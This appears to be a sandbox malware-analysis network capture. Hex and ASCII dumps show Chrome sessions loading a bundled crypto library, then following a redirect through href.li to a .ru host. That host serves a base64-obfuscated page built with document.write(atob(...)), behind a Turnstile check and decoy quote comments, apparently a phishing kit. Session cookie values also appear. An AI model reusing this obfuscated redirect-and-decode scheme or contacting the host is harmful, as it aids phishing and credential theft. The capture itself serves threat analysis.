                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 3b 6b 74 5b 72 5d 3d 73 5e 63 7d 74 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+((65535&i)*i|0);kt[r]=s^c}t[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32 39 36 2a 6c 2e 61 62 73 28 6c 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 76 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: %4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294967296*l.abs(l.sin(t+1))|0}();va
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 76 2c 32 33 2c 48 5b 33 39 5d 29 2c 53 3d 43 28 53
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m=C(m,x,b,S,v,23,H[39]),S=C(S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 2c 65 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o|c>>>32-o)+e}function D(t,e,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC1369INData Raw: 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 42 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: =e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5))),B[i]=e(n.pow(r,1/3)),i++),r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4192.168.2.449741192.0.78.274434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC671OUTGET /?https://HFj.rontishet.ru/iCaWzj6Q/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: href.li
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-ac: 2.jfk _dfw MISS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:19 UTC490INData Raw: 31 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 68 72 65 66 2e 6c 69 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 48 46 6a 2e 72 6f 6e 74 69 73 68 65 74 2e 72 75 2f 69 43 61 57 7a 6a 36 51 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1de<!DOCTYPE html><html><head><title>href.li</title><meta http-equiv="Refresh" content="0; url=https://HFj.rontishet.ru/iCaWzj6Q/" /><meta name="referrer" content="no-referrer" /><script type="text/javascript">/* <![CDATA[ */window.location.repla


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5192.168.2.449745172.67.147.2154434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC654OUTGET /iCaWzj6Q/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: hfj.rontishet.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzLk2h%2Fw40%2FAz7rqjy4vNcR41ovEsFwz2WBT4xpwRyYdJcToXGv5T3pndi69X%2Biz%2Fhzt9SNvBLjqXJA1%2Fl3hTN5KhnPkKprBJ0TeWnlNA%2FjIhoMIuwktHPR6tPNiyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5Raks1QVVvbFZaaTNjUzBLdzQvN3c9PSIsInZhbHVlIjoiem1xeTJBSTJtSkJjTy9jN3k4Z0JBdVdQbjY5Smo5RkptVzhzbkxIR3d4U1lvM25IQjducmt4Sm9aSHJhbmg2WHhMSk00c2NKK1lRdm9PNi9hanpIRVVBT2NORFowbm1GMTdtbklXbm1LdlZxV2Q5dGh1MFRXcXlZOExaU0FNZmIiLCJtYWMiOiI1ODIyZjIxMjc0ZDgwMDcwM2FkMzgwOTc2ZGNmM2I1YmU2NjliMzFmY2Q3NDkxNmU0OTc4NmI4ZmRhNmZlYWRkIiwidGFnIjoiIn0%3D; expires=Mon, 30-Sep-2024 19:20:23 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 73 72 4d 58 4e 42 4e 55 4e 45 61 57 31 47 62 79 74 61 5a 45 31 69 4f 48 5a 44 57 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 47 56 56 55 53 74 46 55 31 70 75 4d 32 56 49 52 55 70 78 52 44 56 77 65 46 64 75 53 33 4a 50 61 79 74 6d 52 33 64 30 53 6c 70 45 63 6d 52 34 4d 6a 4a 46 57 6d 64 6e 4f 47 74 58 52 44 6c 46 64 6d 35 32 52 55 67 34 4d 33 4a 6d 54 6a 4a 77 55 44 5a 50 59 58 4a 47 57 45 68 43 63 33 46 33 54 6e 51 30 63 56 63 77 53 55 35 74 63 55 64 6c 4e 30 6c 4c 54 57 6c 6d 54 6d 4e 43 54 30 51 72 52 6b 68 47 5a 55 78 59 56 54 52 32 55 47 78 4a 64 6a 67 30 52 31 4e 54 4e 55 70 70 55 54 4e 79 4d 6e 70 51 4f 45 70 6f 64 57 34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImsrMXNBNUNEaW1GbytaZE1iOHZDWEE9PSIsInZhbHVlIjoiUGVVUStFU1puM2VIRUpxRDVweFduS3JPaytmR3d0SlpEcmR4MjJFWmdnOGtXRDlFdm52RUg4M3JmTjJwUDZPYXJGWEhCc3F3TnQ0cVcwSU5tcUdlN0lLTWlmTmNCT0QrRkhGZUxYVTR2UGxJdjg0R1NTNUppUTNyMnpQOEpodW4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 34 31 66 65 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 69 66 28 22 68 74 74 70 73 3a 2f 2f 48 46 6a 2e 72 6f 6e 74 69 73 68 65 74 2e 72 75 2f 69 43 61 57 7a 6a 36 51 2f 22 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 55 61 47 55 67 62 32 35 73 65 53 42 77 62 47 46 6a 5a 53 42 33 61 47 56 79 5a 53 42 7a 64 57 4e 6a 5a 58 4e 7a 49 47 4e 76 62 57 56 7a 49 47 4a 6c 5a 6d 39 79 5a 53 42 33 62 33 4a 72 49 47 6c 7a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 41fe<script>if("https://HFj.rontishet.ru/iCaWzj6Q/" == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5UaGUgb25seSBwbGFjZSB3aGVyZSBzdWNjZXNzIGNvbWVzIGJlZm9yZSB3b3JrIGlz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 53 55 39 70 61 30 78 34 59 33 52 71 52 53 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 30 6c 50 61 57 74 4d 65 47 4e 30 61 6b 55 67 4c 6e 52 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dpbi1ib3R0b206MXJlbTt9DQojSU9pa0x4Y3RqRS5jb250YWluZXJ7d2lkdGg6IDEwMCU7cGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI0lPaWtMeGN0akUgLnRle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 52 76 63 43 42 6a 61 47 46 7a 61 57 35 6e 49 48 52 6f 5a 53 42 74 62 32 35 6c 65 53 42 68 62 6d 51 67 63 33 52 68 63 6e 51 67 59 32 68 68 63 32 6c 75 5a 79 42 30 61 47 55 67 63 47 46 7a 63 32 6c 76 62 69 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 78 6b 61 58 59 67 61 57 51 39 49 6b 6c 50 61 57 74 4d 65 47 4e 30 61 6b 55 69 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 62 32 35 30 59 57 6c 75 5a 58 49 69 50 67 30 4b 50 47 52 70 64 69 42 70 5a 44 30 69 52 6b 6c 46 57 58 46 43 62 46 4e 4f 51 69 49 67 59 32 78 68 63 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIDxkaXY+U3RvcCBjaGFzaW5nIHRoZSBtb25leSBhbmQgc3RhcnQgY2hhc2luZyB0aGUgcGFzc2lvbi48L2Rpdj4gLS0+CjxkaXYgaWQ9IklPaWtMeGN0akUiIGNsYXNzPSJjb250YWluZXIiPg0KPGRpdiBpZD0iRklFWXFCbFNOQiIgY2xhc3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:23 UTC1369INData Raw: 64 47 68 6c 49 47 4e 76 62 57 31 76 62 69 42 30 61 47 6c 75 5a 79 42 31 62 6d 4e 76 62 57 31 76 62 6d 78 35 49 48 64 6c 62 47 77 75 49 43 30 74 50 67 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 68 4c 53 30 67 56 47 68 6c 49 48 4e 31 59 32 4e 6c 63 33 4e 6d 64 57 77 67 64 32 46 79 63 6d 6c 76 63 69 42 70 63 79 42 30 61 47 55 67 59 58 5a 6c 63 6d 46 6e 5a 53 42 74 59 57 34 73 49 48 64 70 64 47 67 67 62 47 46 7a 5a 58 49 74 62 47 6c 72 5a 53 42 6d 62 32 4e 31 63 79 34 67 4c 53 30 2b 43 6a 78 7a 59 33 4a 70 63 48 51 2b 44 51 70 30 64 58 4a 75 63 33 52 70 62 47 55 75 63 6d 56 75 5a 47 56 79 4b 43 63 6a 59 32 59 6e 4c 43 42 37 44 51 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dGhlIGNvbW1vbiB0aGluZyB1bmNvbW1vbmx5IHdlbGwuIC0tPgo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjwhLS0gVGhlIHN1Y2Nlc3NmdWwgd2FycmlvciBpcyB0aGUgYXZlcmFnZSBtYW4sIHdpdGggbGFzZXItbGlrZSBmb2N1cy4gLS0+CjxzY3JpcHQ+DQp0dXJuc3RpbGUucmVuZGVyKCcjY2YnLCB7DQo
